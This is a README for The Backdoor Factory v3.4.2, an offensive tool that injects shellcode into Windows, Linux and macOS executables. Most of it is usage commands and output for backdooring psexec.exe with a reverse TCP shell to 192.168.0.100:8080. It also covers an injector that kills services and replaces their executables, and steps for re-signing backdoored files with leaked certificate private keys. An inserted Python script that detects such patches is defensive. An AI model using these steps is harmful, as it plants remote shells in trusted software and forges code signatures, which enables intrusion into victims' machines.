
The Backdoor Factory (BDF) v3.4.2 – Patch PE, ELF, Mach-O binaries with shellcode.


NOTICE: For security professionals and researchers only.

Changelog, The Backdoor Factory (BDF) v3.4.2, 1/11/2017:
* Fix entry-point instruction truncation (rare) and copyright updates.

[Image: BDFactory v3.4.0]

[Image: BDFactory v3.3.0 test run using PE code signing]

The goal of BDF is to patch executable binaries with user-desired shellcode and then continue normal execution of the pre-patched state.

[Image: PE (the Portable Executable format)]

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependencies:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:

git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory
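What BDF does in the run above (find a null-byte cave large enough for the stub, mark the cave's section executable in "Changing Section Flags", redirect the entry point into it) is also what a defender can check for. The following is an added example, not BDF's or the project's code: a dependency-free Python PE32 triage that parses the section table, flags an entry point that lands in a writable-and-executable or non-code section, and lists the caves of at least 402 bytes (the minimum from the run above). parse_pe, find_caves, triage and build_sample_pe are names chosen here, and the sample image is constructed, not a real binary.

```python
import re
import struct

def parse_pe(data):
    """Return (AddressOfEntryPoint, sections) from a PE32 image's headers."""
    e_lfanew = struct.unpack_from('<I', data, 0x3c)[0]
    if data[:2] != b'MZ' or data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('not a PE file')
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from('<HHIIIHH', data, e_lfanew + 4)  # COFF header
    entry = struct.unpack_from('<I', data, e_lfanew + 40)[0]        # optional header + 16
    secs = []
    for i in range(nsec):
        off = e_lfanew + 24 + opt_size + 40 * i                     # section table follows the optional header
        name, vsize, va, rawsize, rawptr = struct.unpack_from('<8sIIII', data, off)
        secs.append(dict(name=name.rstrip(b'\0').decode(), va=va, vsize=vsize, raw=rawptr,
                         rawsize=rawsize, chars=struct.unpack_from('<I', data, off + 36)[0]))
    return entry, secs

def find_caves(data, sec, min_len=402):
    """Null-byte runs of at least min_len bytes in the section's raw data, as (file offset, length)."""
    chunk = bytes(data[sec['raw']:sec['raw'] + sec['rawsize']])
    return [(sec['raw'] + m.start(), m.end() - m.start())
            for m in re.finditer(rb'\x00{%d,}' % min_len, chunk)]

def triage(data, min_len=402):
    """Entry-point checks (what a cave patch plus 'Changing Section Flags' alters) and caves per section."""
    entry, secs = parse_pe(data)
    caves = {s['name']: find_caves(data, s, min_len) for s in secs}
    sec = next((s for s in secs if s['va'] <= entry < s['va'] + max(s['vsize'], s['rawsize'])), None)
    if sec is None:
        return ['entry point outside every section'], caves
    findings = []
    if sec['chars'] & 0x80000000 and sec['chars'] & 0x20000000:    # IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE
        findings.append('entry section %s is writable and executable' % sec['name'])
    if sec['name'] not in ('.text', 'CODE'):
        findings.append('entry point in non-code section %s' % sec['name'])
    return findings, caves

def build_sample_pe(entry_rva, data_chars):
    """Constructed two-section PE32 image (headers only, not a runnable program) used as sample input."""
    img = bytearray(b'MZ').ljust(0x3c, b'\0') + struct.pack('<I', 0x40)           # DOS header, e_lfanew = 0x40
    img += b'PE\0\0' + struct.pack('<HHIIIHH', 0x14c, 2, 0, 0, 0, 224, 0x102)      # signature + COFF header
    img += (struct.pack('<H', 0x10b).ljust(16, b'\0') + struct.pack('<I', entry_rva)).ljust(224, b'\0')  # PE32 optional header
    for name, va, size, raw, chars in ((b'.text', 0x1000, 0x200, 0x200, 0x60000020),
                                       (b'.data', 0x2000, 0x400, 0x400, data_chars)):
        img += struct.pack('<8sIIIIIIHHI', name, size, va, size, raw, 0, 0, 0, 0, chars)
    img = img.ljust(0x800, b'\0')
    img[0x200:0x210] = b'\xcc' * 0x10   # 16 bytes of "code"; the rest of .text is null padding
    img[0x400:0x420] = b'A' * 0x20      # 32 data bytes, then a 0x3e0-byte null cave
    return bytes(img)
```

A clean image yields no findings; an image whose entry point was redirected into a cave in a .data section that has since been made executable yields both the W+X and the non-code-section finding.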

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module looks for target executables to backdoor on disk. It checks whether you have identified the target as a service, checks whether the process is running, kills the process and/or service, injects the executable with the shellcode, saves the original file as file.exe.old (or another suffix of your choice), and attempts to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Code Signing Certs Configure:

git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode
./autogen.sh
./configure
make
sudo make install

Navigate to your BDF home directory.

the-backdoor-factory git:(master) $
curl -O https://www.duosecurity.com/static/files/DellCertificates.zip
mkdir certs
unzip DellCertificates.zip -d certs

Extract the private key from the PFX:

openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem
Enter Import Password: t-span
MAC verified OK
Enter PEM pass phrase: moomoo
Verifying - Enter PEM pass phrase: moomoo

Let's test everything out:

curl -O http://live.sysinternals.com/tcpview.exe # yay http

osslsigncode extract-signature -in tcpview.exe -out sig.txt

hexdump -C sig.txt


Test run:

osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo
osslsigncode extract-signature -in tcpview_signed.exe -out sig.txt
hexdump -C sig.txt


Now open pebin.py in your favorite editor, replace the code at line 1763 (just after the self.binary.close() call on line 1759) with the following, save, and test against your victim machine:

if self.ZERO_CERT is True:
    # cert was removed earlier; re-sign the backdoored file in place with osslsigncode
    # (needs 'import subprocess' at the top of pebin.py if it is not already there)
    p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key',
                          'certs/VerisignPrivateKey.pem', '-n', 'Security', '-in',
                          self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"],
                          '-pass', 'moomoo'])
    p.wait()

Download: the-backdoor-factory-3.4.2.zip | the-backdoor-factory-3.4.2.tar.gz

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source: https://github.com/secretsquirrel/the-backdoor-factory
